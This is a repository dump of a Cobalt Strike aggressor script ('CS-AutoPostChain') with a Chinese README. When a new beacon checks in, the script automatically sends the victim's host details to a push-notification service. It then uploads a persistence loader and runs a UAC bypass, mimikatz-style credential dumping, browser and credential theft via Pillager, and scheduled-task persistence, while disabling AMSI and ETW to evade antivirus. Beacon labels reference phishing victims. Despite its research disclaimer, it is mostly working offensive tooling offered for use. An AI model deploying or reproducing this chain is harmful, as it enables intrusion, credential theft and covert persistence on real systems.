├── .gitignore ├── AutoPostChain.cna ├── README.md ├── dist ├── Pillager │ ├── Pillager.bin │ ├── scloader.x64.o │ └── scloader.x86.o ├── inlineExecute-Assembly │ ├── inlineExecute-Assembly.x64.o │ ├── inlineExecute-Assembly.x86.o │ └── inlineExecuteAssembly │ │ └── inlineExecute-Assembly.cna ├── ipconfig │ ├── ipconfig.x64.o │ └── ipconfig.x86.o ├── screenshot │ ├── screenshot.x64.obj │ └── screenshot.x86.obj └── whoami │ ├── whoami.x64.o │ └── whoami.x86.o ├── image ├── image-20240311202300031.png ├── image-20240311203426501.png ├── image-20240311203512109.png ├── image-20240311212850311.png ├── image-20240311213745013.png ├── image-20240311214005973.png ├── image-20240311214050853.png ├── image-20240311215101658.png └── image-20240311215420501.png └── scripts ├── Pillager.exe ├── SharpBypassUAC.exe ├── SharpHostInfo.exe ├── SharpKatz.exe └── SharpSchTask.exe /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | 3 | -------------------------------------------------------------------------------- /AutoPostChain.cna: -------------------------------------------------------------------------------- 1 | ##### 参数定义 2 | $cserverName = "APC"; 3 | $sleepTime = "0"; 4 | $pushplusToken = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; 5 | $serverchanKey = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; 6 | 7 | # Loader 路径 8 | $LoaderName = "Update.exe"; 9 | $LoaderPath = "C:\\Users\\Public\\"; 10 | $LoaderFullPath = $LoaderPath.$LoaderName; 11 | $b64encodeFullPath = "QzpcVXNlcnNcUHVibGljXFVwZGF0ZS5leGU="; 12 | 13 | # 获取需要的 Beacon 信息 14 | $internalIP = replace(beacon_info($1, "internal")); 15 | 16 | ##### 用户执行链编排 17 | sub NormalUser_Chain { 18 | # UP_Loader($1); 19 | # beacon_inline_execute($1,readbof($1, "whoami"), "go", $null); 20 | # beacon_inline_execute($1,readbof($1, "ipconfig"), "go", $null); 21 | # beacon_inline_execute($1,readobj($1, "screenshot"), "go", $null); 22 | # inlineExecute-Assembly($1,script_resource("/scripts/SharpHostInfo.exe"), "-i $internalIP\/24"); 23 | } 24 | 25 | sub BypassUAC { 26 | # inlineExecute-Assembly($1,script_resource("/scripts/SharpBypassUAC.exe"), "-b computerdefaults -e $b64encodeFullPath"); 27 | } 28 | 29 | sub OnlyAdmin_Chain { 30 | # inlineExecute-Assembly($1,script_resource("/scripts/SharpKatz.exe"), ""); 31 | # Pillager($1); 32 | # inlineExecute-Assembly($1, script_resource("/scripts/SharpSchTask.exe"), "$LoaderFullPath 1"); 33 | } 34 | 35 | ##### ATT&CK 函数模块 36 | sub UP_Loader { 37 | bcd($1, $LoaderPath); 38 | blog($1,"\c9开始上传 Loader"); 39 | bupload($1, script_resource("/scripts/".$LoaderName)); 40 | # bshell($1, "attrib.exe +h $LoaderName"); 41 | blog($1, "\c8Loader 文件上传完成"); 42 | blog($1, "\c8Loader文件位置:$LoaderFullPath"); 43 | } 44 | 45 | sub Pillager { 46 | $bid = $1; 47 | $barch = barch($bid); 48 | 49 | $handle1 = openf(script_resource("dist/Pillager/scloader. $+ $barch $+ .o")); 50 | $data1 = readb($handle1, -1); 51 | closef($handle1); 52 | 53 | $handle2 = openf(script_resource("dist/Pillager/Pillager.bin")); 54 | $data2 = readb($handle2, -1); 55 | closef($handle2); 56 | 57 | $args = bof_pack($bid, "b", $data2); 58 | beacon_inline_execute($bid, $data1, "go", $args); 59 | btask($1, "\c9敏感信息收集完成 文件打包至用户目录:\\AppData\\Local\\Temp\\Pillager.zip"); 60 | } 61 | 62 | ###### 辅助函数定义 63 | 64 | sub Note { 65 | if ($processName eq "beacon.exe") { 66 | bnote($1, "test"); 67 | } 68 | else if ($processName eq "个人简历.exe") { 69 | bnote($1, "XX单位社工钓鱼"); 70 | } 71 | else if ($processName eq "javaEE.exe") { 72 | bnote($1, "维权上线"); 73 | } 74 | else if ($processName eq "svchost.exe") { 75 | bnote($1, "SchTask维权上线"); 76 | } 77 | else if ($processName eq "Update.exe") { 78 | bnote($1, "BypassUAC上线"); 79 | } 80 | } 81 | 82 | ##### HTTP GET 模块 83 | sub http_get { 84 | local('$output'); 85 | $url = [new java.net.URL: $1]; 86 | $stream = [$url openStream]; 87 | $handle = [SleepUtils getIOHandle: $stream, $null]; 88 | 89 | @content = readAll($handle); 90 | 91 | foreach $line (@content) { 92 | $output .= $line . "\r\n"; 93 | } 94 | println($output); 95 | } 96 | 97 | ##### BOF 加载 98 | sub readbof { 99 | local('$barch $handle $data $args'); 100 | $barch = barch($1); 101 | 102 | # read in the right BOF file 103 | println(script_resource("/dist/$2 $+ / $+ $2 $+ . $+ $barch $+ .o")); 104 | $handle = openf(script_resource("/dist/$2 $+ / $+ $2 $+ . $+ $barch $+ .o")); 105 | $data = readb($handle, -1); 106 | closef($handle); 107 | if(strlen($data) == 0) 108 | { 109 | berror($1, "[-] Error: BOF bin could not be found. Please ensure the compiled BOF (.o file) exists in the same folder as this aggressor script."); 110 | } 111 | 112 | # announce what we're doing 113 | btask($1, "AutoChain is Running BOF $2"); 114 | return $data; 115 | } 116 | sub readobj { 117 | local('$barch $handle $data $args'); 118 | $barch = barch($1); 119 | 120 | # read in the right BOF file 121 | println(script_resource("/dist/$2 $+ / $+ $2 $+ . $+ $barch $+ .obj")); 122 | $handle = openf(script_resource("/dist/$2 $+ / $+ $2 $+ . $+ $barch $+ .obj")); 123 | $data = readb($handle, -1); 124 | closef($handle); 125 | if(strlen($data) == 0) 126 | { 127 | berror($1, "[-] Error: BOF bin could not be found. Please ensure the compiled BOF (.obj file) exists in the same folder as this aggressor script."); 128 | } 129 | 130 | # announce what we're doing 131 | btask($1, "AutoChain is Running BOF(.obj) $2"); 132 | return $data; 133 | } 134 | 135 | ##### inlineExecute-Assembly 模块 136 | 137 | global('$etw $amsi $appDomain $version'); 138 | 139 | #Global vars don't change 140 | $etw = 1; 141 | $revertETW = 0; 142 | $amsi = 1; 143 | $mailSlot = 1; 144 | $entryPoint = 1; 145 | 146 | #Default values set here - if you don't want to use flags to change -> change here 147 | $appDomain = "DefaultDomain"; 148 | $pipeName = "DefaultPipe"; 149 | $mailSlotName = "DefaultMailSlot"; 150 | #例子:inlineExecute-Assembly($1,script_resource("/scripts/SharpHunter.exe"), "run \"whoami /all\""); 151 | 152 | sub inlineExecute-Assembly { 153 | 154 | $data = substr($0, 23); 155 | @args = split(' ', $data); 156 | 157 | local('$_amsi $_etw $_revertETW $_appDomain $_dotNetAssembly $_version $_assemblyargs $_assemblyWithArgs $_entryPoint $_mailSlot $_mailSlotName $_mailSlotNameArgs $_pipeName $_pipeNameArgs'); 158 | 159 | $_amsi = 1; 160 | $_etw = 1; 161 | $_revertETW = 0; 162 | $_mailSlot = 1; 163 | $_mailSlotName = "DefaultMailSlot"; 164 | $_mailSlotNameArgs = ""; 165 | $_pipeName = "DefaultPipe"; 166 | $_pipeNameArgs = ""; 167 | $_entryPoint = 1; 168 | $_appDomain = "DefaultDomain"; 169 | $_appDomainArgs = ""; 170 | $_dotNetAssembly = $2; 171 | $_dotNetAssemblyArgs = $3; 172 | $_assemblyWithArgs = $_dotNetAssemblyArgs; 173 | 174 | @CliOptions = @("--amsi", "--etw", "--revertetw", "--dotnetassembly", "--assemblyargs", "--appdomain", "--pipe", "--mailslot", "--main"); 175 | 176 | for ($i = 0; $i < size(@args); $i++){ 177 | 178 | if (@args[$i] iswm "--etw"){ 179 | $_etw = 1; 180 | }else if (@args[$i] iswm "--amsi"){ 181 | $_amsi = 1; 182 | }else if (@args[$i] iswm "--revertetw"){ 183 | $_revertETW = 1; 184 | }else if (@args[$i] iswm "--main"){ 185 | $_entryPoint = int(0); 186 | }else if (@args[$i] iswm "--dotnetassembly"){ 187 | $i = $i + 1; 188 | $_dotNetAssembly = @args[$i]; 189 | }else if (@args[$i] iswm "--assemblyargs"){ 190 | $i = $i + 1; 191 | $count = 0; 192 | for ($j = $i; $j < size(@args); $j++){ 193 | if(@args[$j] in @CliOptions){ 194 | break; 195 | }else{ 196 | @_dotNetAssemblyArgs[$count] = @args[$j]; 197 | 198 | #Taking care of arguments embedded within single/double quotes and consider it as one single argument (disregarding spaces). 199 | if(('"' isin @_dotNetAssemblyArgs[$count] || "'" isin @_dotNetAssemblyArgs[$count])){ 200 | 201 | $k = 0; 202 | $j = $j + 1; 203 | 204 | for($k = $j; $k < size(@args); $k++){ 205 | if(lindexOf(@_dotNetAssemblyArgs[$count], '"') == (strlen(@_dotNetAssemblyArgs[$count]) - 1) || lindexOf(@_dotNetAssemblyArgs[$count], "'") == (strlen(@_dotNetAssemblyArgs[$count]) - 1)){ 206 | $k = $k - 1; 207 | break; 208 | } 209 | if('"' isin @args[$k] || "'" isin @args[$k]){ 210 | @_dotNetAssemblyArgs[$count] = @_dotNetAssemblyArgs[$count]." ".@args[$k]; 211 | break; 212 | }else{ 213 | @_dotNetAssemblyArgs[$count] = @_dotNetAssemblyArgs[$count]." ".@args[$k]; 214 | } 215 | } 216 | $j = $k; 217 | $i = $k; 218 | } 219 | $count = $count + 1; 220 | } 221 | } 222 | }else if (@args[$i] iswm "--appdomain"){ 223 | $i = $i + 1; 224 | $count = 0; 225 | for ($j = $i; $j < size(@args); $j++){ 226 | if(@args[$j] in @CliOptions){ 227 | break; 228 | }else{ 229 | @_appDomain[$count] = @args[$j]; 230 | 231 | #Taking care of arguments embedded within single/double quotes and consider it as one single argument (disregarding spaces). 232 | if(('"' isin @_appDomain[$count] || "'" isin @_appDomain[$count])){ 233 | 234 | $k = 0; 235 | $j = $j + 1; 236 | 237 | for($k = $j; $k < size(@args); $k++){ 238 | if(lindexOf(@_appDomain[$count], '"') == (strlen(@_appDomain[$count]) - 1) || lindexOf(@_appDomain[$count], "'") == (strlen(@_appDomain[$count]) - 1)){ 239 | $k = $k - 1; 240 | break; 241 | } 242 | if('"' isin @args[$k] || "'" isin @args[$k]){ 243 | @_appDomain[$count] = @_appDomain[$count]." ".@args[$k]; 244 | break; 245 | }else{ 246 | @_appDomain[$count] = @_appDomain[$count]." ".@args[$k]; 247 | } 248 | } 249 | 250 | $j = $k; 251 | $i = $k; 252 | } 253 | $count = $count + 1; 254 | } 255 | } 256 | }else if (@args[$i] iswm "--mailslot"){ 257 | $_mailSlot = 1; 258 | $i = $i + 1; 259 | $count = 0; 260 | for ($j = $i; $j < size(@args); $j++){ 261 | if(@args[$j] in @CliOptions){ 262 | break; 263 | }else{ 264 | @_mailSlotName[$count] = @args[$j]; 265 | 266 | #Taking care of arguments embedded within single/double quotes and consider it as one single argument (disregarding spaces). 267 | if(('"' isin @_mailSlotName[$count] || "'" isin @_mailSlotName[$count])){ 268 | 269 | $k = 0; 270 | $j = $j + 1; 271 | 272 | for($k = $j; $k < size(@args); $k++){ 273 | if(lindexOf(@_mailSlotName[$count], '"') == (strlen(@_mailSlotName[$count]) - 1) || lindexOf(@_mailSlotName[$count], "'") == (strlen(@_mailSlotName[$count]) - 1)){ 274 | $k = $k - 1; 275 | break; 276 | } 277 | if('"' isin @args[$k] || "'" isin @args[$k]){ 278 | @_mailSlotName[$count] = @_mailSlotName[$count]." ".@args[$k]; 279 | break; 280 | }else{ 281 | @_mailSlotName[$count] = @_mailSlotName[$count]." ".@args[$k]; 282 | } 283 | } 284 | $j = $k; 285 | $i = $k; 286 | } 287 | $count = $count + 1; 288 | } 289 | } 290 | }else if (@args[$i] iswm "--pipe"){ 291 | $i = $i + 1; 292 | $count = 0; 293 | for ($j = $i; $j < size(@args); $j++){ 294 | if(@args[$j] in @CliOptions){ 295 | break; 296 | }else{ 297 | @_pipeName[$count] = @args[$j]; 298 | 299 | #Taking care of arguments embedded within single/double quotes and consider it as one single argument (disregarding spaces). 300 | if(('"' isin @_pipeName[$count] || "'" isin @_pipeName[$count])){ 301 | 302 | $k = 0; 303 | $j = $j + 1; 304 | 305 | for($k = $j; $k < size(@args); $k++){ 306 | if(lindexOf(@_pipeName[$count], '"') == (strlen(@_pipeName[$count]) - 1) || lindexOf(@_pipeName[$count], "'") == (strlen(@_pipeName[$count]) - 1)){ 307 | $k = $k - 1; 308 | break; 309 | } 310 | if('"' isin @args[$k] || "'" isin @args[$k]){ 311 | @_pipeName[$count] = @_pipeName[$count]." ".@args[$k]; 312 | break; 313 | }else{ 314 | @_pipeName[$count] = @_pipeName[$count]." ".@args[$k]; 315 | } 316 | } 317 | 318 | $j = $k; 319 | $i = $k; 320 | } 321 | 322 | $count = $count + 1; 323 | 324 | } 325 | } 326 | } 327 | } 328 | 329 | # Appending .NET assembly arguments to $_assemblyWithArgs var (separated by " ") 330 | 331 | for ($i = 0; $i < size(@_dotNetAssemblyArgs); $i++){ 332 | if (@_dotNetAssemblyArgs[$i] ne "") { 333 | if ($_assemblyWithArgs ne "") 334 | { 335 | $_assemblyWithArgs = $_assemblyWithArgs." ".@_dotNetAssemblyArgs[$i]; 336 | } 337 | else 338 | { 339 | $_assemblyWithArgs = @_dotNetAssemblyArgs[$i]; 340 | } 341 | } 342 | } 343 | 344 | # Appending appDomain arguments to $_appDomainArgs var (separated by " ") 345 | 346 | for ($i = 0; $i < size(@_appDomain); $i++){ 347 | if (@_appDomain[$i] ne "") { 348 | if ($_appDomainArgs ne "") 349 | { 350 | $_appDomainArgs = $_appDomainArgs." ".@_appDomain[$i]; 351 | } 352 | else 353 | { 354 | $_appDomainArgs = @_appDomain[$i]; 355 | } 356 | } 357 | } 358 | 359 | # Appending mailSlot arguments to $_mailSlotNameArgs var (separated by " ") 360 | 361 | for ($i = 0; $i < size(@_mailSlotName); $i++){ 362 | if (@_mailSlotName[$i] ne "") { 363 | if ($_mailSlotNameArgs ne "") 364 | { 365 | $_mailSlotNameArgs = $_mailSlotNameArgs." ".@_mailSlotName[$i]; 366 | } 367 | else 368 | { 369 | $_mailSlotNameArgs = @_mailSlotName[$i]; 370 | } 371 | } 372 | } 373 | 374 | # Appending pipeName arguments to $_pipeNameArgs var (separated by " ") 375 | 376 | for ($i = 0; $i < size(@_pipeName); $i++){ 377 | if (@_pipeName[$i] ne "") { 378 | if ($_pipeNameArgs ne "") 379 | { 380 | $_pipeNameArgs = $_pipeNameArgs." ".@_pipeName[$i]; 381 | } 382 | else 383 | { 384 | $_pipeNameArgs = @_pipeName[$i]; 385 | } 386 | } 387 | } 388 | 389 | if ($_appDomainArgs eq "") { 390 | $_appDomainArgs = $appDomain; 391 | } 392 | if ($_mailSlotNameArgs eq "") { 393 | $_mailSlotNameArgs = $mailSlotName; 394 | } 395 | if ($_pipeNameArgs eq "") { 396 | $_pipeNameArgs = $pipeName; 397 | } 398 | if ($_amsi == "") { 399 | $_amsi = $amsi; 400 | } 401 | if ($_etw == "") { 402 | $_etw = $etw; 403 | } 404 | if ($_revertETW == "") { 405 | $_revertETW = $revertETW; 406 | } 407 | if ($_entryPoint ne int(0)) { 408 | $_entryPoint = $entryPoint; 409 | } 410 | if ($_mailSlot == "") { 411 | $_mailSlot = $mailSlot; 412 | } 413 | 414 | # Error Handling 415 | 416 | $assemblyPath = $_dotNetAssembly; 417 | $bid = $1; 418 | if ($assemblyPath eq "") { 419 | berror($bid, "Run 'help inlineExecute-Assembly'\n"); 420 | return; 421 | } 422 | 423 | if (!-exists $assemblyPath || !-isFile $assemblyPath){ 424 | berror($bid, "File ".$assemblyPath." doesn't exist\n"); 425 | return; 426 | } 427 | 428 | # Reading assembly bytes and get the size in bytes 429 | $fileHandle = openf($_dotNetAssembly); 430 | $assemblyLength = lof($_dotNetAssembly); 431 | $assemblyBytes = readb($fileHandle, -1); 432 | closef($fileHandle); 433 | 434 | # pack our arguments 435 | $bofArgs = bof_pack($1, "ziiiiizzzib", $_appDomainArgs, $_amsi, $_etw, $_revertETW, $_mailSlot, $_entryPoint, $_mailSlotNameArgs, $_pipeNameArgs, $_assemblyWithArgs, $assemblyLength, $assemblyBytes); 436 | # execute it. 437 | beacon_inline_execute($1, readbof($1, "inlineExecute-Assembly"), "go", $bofArgs); 438 | btask($1, "\c9InlineExecute-Assembly $2 $3"); 439 | 440 | clear(@_assemblyWithArgs); 441 | clear(@_dotNetAssemblyArgs); 442 | clear(@_appDomainArgs); 443 | clear(@_appDomain); 444 | clear(@_mailSlotNameArgs); 445 | clear(@_mailSlotName); 446 | clear(@_pipeNameArgs); 447 | clear(@_pipeName); 448 | } 449 | 450 | action("\c8* AutoPostChain - Aggressor Load Success!"); 451 | 452 | ##### 自动化链编排 453 | on beacon_initial { 454 | 455 | blog($1,"\c9Automated Post Exploitation Chain (@lintstar)"); 456 | 457 | # 获取主机信息 458 | $internalIP = replace(beacon_info($1, "internal"), " ", "_"); 459 | $externalIP = replace(beacon_info($1, "external"), " ", "_"); 460 | $computerName = replace(beacon_info($1, "computer"), " ", "_"); 461 | $userName = replace(beacon_info($1, "user"), " ", "_"); 462 | $listennerName = replace(beacon_info($1, "listener"), " ", "_"); 463 | $processName = replace(beacon_info($1, "process"), " ", "_"); 464 | $pidName = replace(beacon_info($1, "pid"), " ", "_"); 465 | $archName = replace(beacon_info($1, "arch"), " ", "_"); 466 | $onlineUrl = 'https://www.pushplus.plus/send?token='.$pushplusToken.'&title=%5B'.$cserverName.'%5D%20%E5%92%AC%E9%92%A9%20%F0%9F%8E%AE%20'.$processName.'&template=markdown&content=HostName%3A%20'.$computerName.'%0A%0AExternal%3A%20'.$externalIP.'%0A%0AInternal%3A%20'.$internalIP.'%0A%0AUserName%3A%20'.$userName.'%0A%0AProcess%3A%20'.$processName.'%0A%0APid%3A%20'.$pidName; 467 | # $onlineUrl = 'https://sctapi.ftqq.com/'.$serverchanKey.'.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0Aip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName; 468 | 469 | 470 | println('================================================================================================================='); 471 | println('[+] '.formatDate('MM/dd/yyyy HH:mm:ss (z)').' IP:'.$internalIP.' UserName:'.$userName.' ComputerName:'.$computerName); 472 | 473 | ###### 存活逻辑判断 474 | 475 | $x = 0; 476 | $y = 0; 477 | $z = 0; 478 | 479 | foreach $bid (beacon_ids()) { 480 | 481 | # bid 遍历主机信息信息 482 | $inIP = replace(beacon_info($bid, "internal"), " ", "_"); 483 | $uName = replace(beacon_info($bid, "user"), " ", "_"); 484 | $prName = replace(beacon_info($bid, "process"), " ", "_"); 485 | $piName = replace(beacon_info($bid, "pid"), " ", "_"); 486 | $hName = replace(beacon_info($bid, "computer"), " ", "_"); 487 | $lastTime = replace(beacon_info($bid, "last"), " ", "_"); 488 | 489 | if (-isactive $bid && $lastTime <= 60000) { 490 | 491 | @ip[$x] = $inIP; 492 | @pid[$x] = $piName; 493 | @pro[$x] = $prName; 494 | @last[$x] = $lastTime; 495 | @un[$x] = $uName; 496 | 497 | # 如果遍历的 hName 与当前会话的 computerName 相同,则 x+1 498 | if ($hName eq $computerName && $inIP eq $internalIP) { 499 | 500 | $x = $x + 1; 501 | 502 | # 如果为管理员权限,则 y+1 503 | if (-isadmin $bid) { 504 | $y = $y + 1; 505 | } 506 | $z = $x - $y 507 | } 508 | } 509 | } 510 | 511 | blog($1, "\c8====================="); 512 | blog($1, "\c8当前主机总存活数: $+ $x"); 513 | blog($1, "\c8管理员权限会话存活数: $+ $y"); 514 | blog($1, "\c8用户权限会话存活数: $+ $z"); 515 | blog($1, "\c8====================="); 516 | 517 | ###### 场景流程编排 518 | 519 | Note($1); 520 | # bsleep($1, $sleepTime); 521 | if (!-isadmin $1) { 522 | http_get($onlineUrl); 523 | blog($1, "\c9普通用户权限"); 524 | 525 | # 直接上线普通用户权限 526 | if ($x < 2) { 527 | NormalUser_Chain($1); 528 | BypassUAC($1); 529 | 530 | # 重复上线普通用户权限 531 | }else{ 532 | blog($1, "\cB当前主机存活数大于等于2 请检查是否已提升至管理员权限 [ AutoPostChain End ]"); 533 | blog($1, "\c9存活列表:\nIP: ".replace(@ip, "@", "")."\n进程名: ".replace(@pro, "@", "")."\n进程号: ".replace(@pid, "@", "")."\n心跳: ".replace(@last, "@", "")."\n用户名: ".replace(@un, "@", "")); 534 | } 535 | 536 | } else { 537 | http_get($onlineUrl); 538 | blog($1, "\c9管理员权限"); 539 | 540 | # 普通用户绕 UAC 上线管理员权限 541 | if ($y < 2 && $z > 0) { 542 | blog($1, "\c8该管理员会话为普通用户通过绕 UAC 上线 不再进行 UAC Bypass"); 543 | OnlyAdmin_Chain($1); 544 | 545 | # 直接上线管理员权限 546 | } else if ($y < 2 && $z < 1) { 547 | NormalUser_Chain($1); 548 | OnlyAdmin_Chain($1); 549 | 550 | # 重复上线管理员权限 551 | }else { 552 | blog($1, "\cB该IP存活数量大于2 且已经存在管理员权限会话 [ AutoPostChain End ]"); 553 | blog($1, "\c9存活列表:\nIP: ".replace(@ip, "@", "")."\n进程名: ".replace(@pro, "@", "")."\n进程号: ".replace(@prName, "@", "")."\n心跳: ".replace(@lastTime, "@", "")."\n用户名: ".replace(@un, "@", "")); 554 | } 555 | } 556 | } 557 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## CS-AutoPostChain 2 | 3 |
4 | 5 | **基于 OPSEC 的 CobaltStrike 后渗透自动化链** 6 | 7 | ![image-20240311202300031](image/image-20240311202300031.png) 8 | 9 | > 本项目结合 LSTAR - CobaltStrike 综合后渗透插件一起使用更佳:https://github.com/lintstar/LSTAR 10 | 11 | ## 🎉 项目简介 12 | 13 | **在攻防实战中发现存在以下困境:** 14 | 15 | 1. 鱼叉式水坑、社工钓鱼以及威胁猎捕场景下**上线时间不可控**,且无法二十四小时守在电脑附近,同时常见的自动权限维持插件需要提前在目标机器放置木马,并且存在维权上线然后**重复维权的套娃问题** 16 | 2. 在 HW 场景下单个主机的信息收集、权限维持和凭据收集等大部分都是重复性操作,且进行 CS 多人协作时容易**重复收集降低效率** 17 | 3. 已有的自动化链(上线自动执行 whoami 截图等操作)大部分使用 brun、bshell、bspawn 等 CS 原生敏感命令,容易被杀软检测**关联到木马进程导致掉线**,已不适应如今的攻防场景 18 | 19 | **本项目尝试将后渗透攻击链中的部分人工重复性工作借助 CobaltStrike 转变为自动化并兼顾隐蔽性(Bypass):** 20 | 21 | - **遵循 OPSEC(Operations Security)原则,RedTeam 结合 C2 隐匿、木马免杀、工具魔改二开、BOF、自研工具/C2、ATT&CK 攻击手法等结合使用可构建完整的隐蔽自动化链** 22 | - **企业安全建设方面也可借此做自动化内网攻击编排进行内网终端侧、流量侧防护效果的验证。** 23 | 24 | ## 📜 免责声明 25 | 26 | **本项目仅适用于安全研究及合法的企业安全建设行为 一切后果及责任均由使用者本人承担** 27 | 28 | ## 🌟 功能特性 29 | 30 | - **敏感操作通过 BOF 和 C# 程序执行,避免文件落地以及隐蔽动态行为特征** 31 | - **上线主机结合智能化存活判断进行自动权限维持,杜绝重复上线** 32 | - **将 LSTAR 后渗透插件的功能函数化,为不同场景下编排定制化的自动化链提供便利** 33 | - **Bypass AV ① 动态查杀 ② Windows Defender 的 AMSI/ETW** 34 | - **C# 内存加载 + BOF + 定制化免杀工具及技术 = 无限可能** 35 | 36 | ## 🚀 流程编排 37 | 38 | **项目 CNA 脚本默认配置未做任何操作,仅做存活权限信息判断和控制台打印信息** 39 | 40 | **‼️ 请在理解原理的情况下结合实战需求进行合理配置,整体实现思路详见:https://xz.aliyun.com/t/14076** 41 | 42 | ### 上线微信通知 43 | 44 | 冲锋马上线时建议取消注释 bsleep,上线默认激活 Beacon 执行自动化链内容(等效控制台 Sleep0 命令) 45 | 46 | ![image-20240311212850311](image/image-20240311212850311.png) 47 | 48 | #### 配置 Token 49 | 50 | **http://www.pushplus.plus/push1.html 复制自己的 token 替换到参数定义的地方** 51 | 52 | ```shell 53 | $pushplusToken = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; 54 | ``` 55 | 56 | Server 酱同理 57 | 58 | ```shell 59 | $serverchanKey = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; 60 | ``` 61 | 62 | 根据需要注释对应配置代码 63 | 64 | ![image-20240311213745013](image/image-20240311213745013.png) 65 | 66 | #### 服务端后台挂载 67 | 68 | 使用 agscript 在服务器端运行 cna 文件,和挂载 CobaltStrike 一样,把 cna 脚本也挂载到后台: 69 | 70 | ```shell 71 | root@VM-8-8-ubuntu:~# screen -S AutoPostChain 72 | root@VM-8-8-ubuntu:~# ./agscript [host] [port] [user] [pass] 73 | ``` 74 | 75 | 这里 agscript 的用法为: 76 | 77 | ``` 78 | ./agscript [host] [port] [user] [pass] 79 | ``` 80 | 81 | - [host] # 服务器的 ip 地址。 82 | - [port] # cs 的端口号,启动 cs 时有显示。 83 | - [user] # 后台挂载脚本时连接到 teamserver 的用户名。 84 | - [pass] # 启动服务端 cs 时设置的密码。 85 | - [path] # cna 文件的路径。 86 | 87 | ### 上线提醒标记 88 | 89 | 除去常规提醒外,当有多台 C2 服务器时,配置好 cserverName 参数可以在通知标题进行上线提醒的区分: 90 | 91 | ```shell 92 | $cserverName = "AT"; 93 | ``` 94 | 95 | ![image-20240311203426501](image/image-20240311203426501.png) 96 | 97 | 攻防场景下可通过上线进程来自动标记是针对哪个目标的终端权限上线了: 98 | 99 | ```shell 100 | sub Note { 101 | if ($processName eq "beacon.exe") { 102 | bnote($1, "test"); 103 | } 104 | else if ($processName eq "个人简历.exe") { 105 | bnote($1, "XX单位社工钓鱼"); 106 | } 107 | else if ($processName eq "javaEE.exe") { 108 | bnote($1, "维权上线"); 109 | } 110 | else if ($processName eq "Update.exe") { 111 | bnote($1, "BypassUAC上线"); 112 | } 113 | } 114 | ``` 115 | 116 | ![image-20240311203512109](image/image-20240311203512109.png) 117 | 118 | ### 智能化权限维持 119 | 120 | **‼️ 相关工具脚本只做示例演示,请使用本项目时结合实战场景进行针对性免杀和二次开发** 121 | 122 | #### 配置Loader 123 | 124 | 制作好免杀的维权马后放到 scripts 目录下,配置以下参数: 125 | 126 | ```shell 127 | # Loader 路径 128 | $LoaderName = "Update.exe"; 129 | $LoaderPath = "C:\\Users\\Public\\"; 130 | $LoaderFullPath = $LoaderPath.$LoaderName; 131 | $b64encodeFullPath = "QzpcVXNlcnNcUHVibGljXFVwZGF0ZS5leGU="; 132 | ``` 133 | 134 | `$b64encodeFullPath` 为维权马 Windows 完整路径 `C:\\Users\\Public\\Update.exe` Base64 加密后的内容,只是为了配合 SharpBypassUAC 工具参数输入,实际情况请替换其他动态行为免杀的 BypassUAC 程序。 135 | 136 | #### 配置用户执行链 137 | 138 | 取消注释以下代码 139 | 140 | ![image-20240311214050853](image/image-20240311214050853.png) 141 | 142 | **这里用两个场景函数进行编排示例:** 143 | 144 | - `NormalUser_Chain` 函数用来编排不需要管理员权限即可执行的操作如信息收集、屏幕截图、上传文件等; 145 | - `OnlyAdmin_Chain` 函数用来编排只有管理员权限才能做的操作比如凭据获取、隐蔽权限维持等。 146 | 147 | **其中 `NormalUser_Chain` 执行流程如下:** 148 | 149 | 1. 上传木马到指定目录: 150 | 151 | ```shell 152 | sub UP_Loader { 153 | bcd($1, $LoaderPath); 154 | blog($1,"\c9开始上传 Loader"); 155 | bupload($1, script_resource("/scripts/".$LoaderName)); 156 | blog($1, "\c8Loader 文件上传完成"); 157 | blog($1, "\c8Loader文件位置:$LoaderFullPath"); 158 | } 159 | ``` 160 | 161 | 2. 调用 `readbof` 函数加载 BOF 并执行 whoami、ipconfig、screenshot ; 162 | 163 | 3. 调用 `inlineExecute-Assembly` 函数通过 SharpHostInfo 扫描当前 C 端主机信息。 164 | 165 | > ScreenshotBOFPlus 优化了能在无需注入的情况下在 Windows 启动全局缩放时获取完整截图 166 | 167 | 而 ` BypassUAC` 调用 `inlineExecute-Assembly` 函数执行 SharpBypassUAC 工具通过 `computerdefaults` 技术以及编码后的木马路径进行 UAC 绕过,并上线管理器权限 Session。 168 | 169 | **最后 `OnlyAdmin_Chain` 执行流程如下:** 170 | 171 | 1. 调用 `inlineExecute-Assembly` 函数执行 SharpKatz 工具内存中加载 mimikatz 获取主机凭据; 172 | 2. 执行 Pillager BOF 程序不落地的情况下收集主机浏览器、软件、账户凭据等敏感信息; 173 | 3. 调用 `inlineExecute-Assembly` 函数执行 SharpSchTask 工具进行隐蔽权限维持。 174 | 175 | ![image-20240311214005973](image/image-20240311214005973.png) 176 | 177 | #### 场景流程编排 178 | 179 | 通过 `isadmin` 结合存活权限判断实现上述执行场景流程的编排: 180 | 181 | ![image-20240311215101658](image/image-20240311215101658.png) 182 | 183 | 这样通过 BypassUAC 二次上线管理员权限时,将只会执行 `OnlyAdmin_Chain($1);` : 184 | 185 | ![image-20240311215420501](image/image-20240311215420501.png) 186 | 187 | 此场景流程编排仅做示例使用,请结合实际需求和实战场景移植相应 BOF 功能等技术进行配置。 188 | 189 | ## 👍 参考项目 190 | 191 | - https://github.com/h0e4a0r1t/Automatic-permission-maintenance 192 | - https://github.com/gooderbrother/antiVirusCheck 193 | - https://github.com/anthemtotheego/InlineExecute-Assembly 194 | - https://github.com/trustedsec/CS-Situational-Awareness-BOF 195 | - https://github.com/qwqdanchun/Pillager 196 | - https://github.com/baiyies/ScreenshotBOFPlus 197 | - https://github.com/shmilylty/SharpHostInfo 198 | - https://github.com/FatRodzianko/SharpBypassUAC 